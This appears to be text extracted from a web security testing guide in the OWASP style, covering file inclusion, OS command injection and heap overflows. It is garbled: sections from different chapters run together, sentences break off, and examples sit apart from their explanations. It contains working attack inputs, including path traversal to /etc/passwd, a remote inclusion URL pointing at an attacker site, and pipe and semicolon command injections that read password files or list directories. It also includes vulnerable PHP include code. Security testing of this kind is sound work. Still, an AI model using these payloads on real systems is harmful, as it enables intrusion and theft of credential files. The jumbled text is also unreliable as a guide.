Summary
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implement- ed in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:
• Code execution on the web server
• Code execution on the client-side such as JavaScript which can lead
http://vulnerable_host/preview.php?file=../../../../etc/passwd <?php “include/”.include($_GET[‘filename’].“.php”); ?> http://vulnerable_host/preview.php?file=../../../../etc/pass- wd%00 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin alex:x:500:500:alex:/home/alex:/bin/bash margo:x:501:501::/home/margo:/bin/bash ... $incfile = $_REQUEST[“file”]; include($incfile.”.php”); http://vulnerable_host/vuln_page.php?file=http://attack- er_site/malicous_page
If the application doesn’t validate the request, we can obtain the fol- lowing result:
In this case, we have successfully performed an OS injection attack. is subject to this exploit. With the ability to execute OS commands,
the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
How to Test
When viewing a file in a web application, the file name is often shown in the URL. Perl allows piping data from a process into an open state- ment. The user can simply append the Pipe symbol “|” onto the end of the file name.
Example URL before alteration:
Example URL modified:
This will execute the command “/bin/ls”.
Appending a semicolon to the end of a URL for a .PHP page followed by an operating system command, will execute the command. %3B is url encoded and decodes to semicolon
Example:
Example
Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up WebScarab, you can obtain a POST HTTP like the following:
In this post request, we notice how the application retrieves the pub- lic documentation. Now we can test if it is possible to add an operat- ing system command to inject in the POST HTTP. Try the following:
http://sensitive/cgi-bin/userData.pl?doc=user1.txt
http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
POST http://www.example.com/public/doc HTTP/1.1 Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,- text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E- 34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded Content-length: 33
Doc=Doc1.pdf
POST http://www.example.com/public/doc HTTP/1.1 Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/ html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E- 34F24A0A5
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded Content-length: 33
Doc=Doc1.pdf+|+Dir c:\
Exec Results for ‘cmd.exe /c type “C:\httpd\public\ doc\”Doc=Doc1.pdf+|+Dir c:\’
Output...
Il volume nell’unità C non ha etichetta. Numero di serie Del volume: 8E3F-4B61 Directory of c:\ 18/10/2006 00:27 2,675 Dir_Prog.txt 18/10/2006 00:28 3,887 Dir_ProgFile.txt 16/11/2006 10:43 Doc 11/11/2006 17:25 Documents and Settings 25/10/2006 03:11 I386 14/11/2006 18:51 h4ck3r 30/09/2005 21:40 25,934 OWASP1.JPG 03/11/2006 18:29 Prog 18/11/2006 11:20 Program Files 16/11/2006 21:12 Software 24/10/2006 18:25 Setup 24/10/2006 23:37 Technologies 18/11/2006 11:14 3 File 32,496 byte
13 Directory 6,921,269,248 byte disponibili Return code: 0
in these tags is overwritten. When the heap management rou- tine frees the buffer, a memory address overwrite takes place leading to an access violation. When the overflow is executed in a controlled fashion, the vulnerability would allow an adversary to overwrite a desired memory location with a user-controlled val- ue. In practice, an attacker would be able to overwrite function pointers and various addresses stored in structures like GOT, .dtors or TEB with the address of a malicious payload.
There are numerous variants of the heap overflow (heap cor- ruption) vulnerability that can allow anything from overwriting function pointers to exploiting memory management structures for arbitrary code execution. Locating heap overflows requires closer examination in comparison to stack overflows, since there are certain conditions that need to exist in the code for these vulnerabilities to be exploitable.
How to Test Black Box testing
The principles of black box testing for heap overflows remain the same as stack overflows. The key is to supply as input strings that are longer than expected. Although the test process re- mains the same, the results that are visible in a debugger are significantly different. While in the case of a stack overflow, an instruction pointer or SEH overwrite would be apparent, this does not hold true for a heap overflow condition. When debug- ging a windows program, a heap overflow can appear in several different forms, the most common one being a pointer exchange taking place after the heap management routine comes into ac- tion. Shown below is a scenario that illustrates a heap overflow vulnerability.
The two registers shown, EAX and ECX, can be populated with user supplied addresses which are a part of the data that is used to overflow the heap buffer. One of the addresses can point to a function pointer which needs to be overwritten, for example UEF (Unhandled Exception filter), and the other can be the address of user supplied code that needs to be executed.
When the MOV instructions shown in the left pane are execut- ed, the overwrite takes place and, when the function is called, user supplied code gets executed. As mentioned previously, oth- er methods of testing such vulnerabilities include reverse engi- neering the application binaries, which is a complex and tedious
Tools
• OWASP WebScarab • OWASP WebGoat References White papers • http://www.securityfocus.com/infocus/1709 Remediation SanitizationThe URL and form data needs to be sanitized for invalid charac- ters. A “blacklist” of characters is an option but it may be difficult to think of all of the characters to validate against. Also there may be some that were not discovered as of yet. A “white list” containing only allowable characters should be created to vali- date the user input. Characters that were missed, as well as un- discovered threats, should be eliminated by this list.
Permissions
The web application and its components should be running under strict permissions that do not allow operating system command execution. Try to verify all these informations to test from a Gray Box point of view